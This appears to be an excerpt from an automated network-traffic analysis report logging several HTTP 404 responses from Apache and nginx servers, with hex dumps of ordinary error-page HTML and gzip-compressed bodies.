        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 07:17:19 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 07:17:21 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 07:17:24 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 07:17:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 07:17:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 07:17:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 07:17:37 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 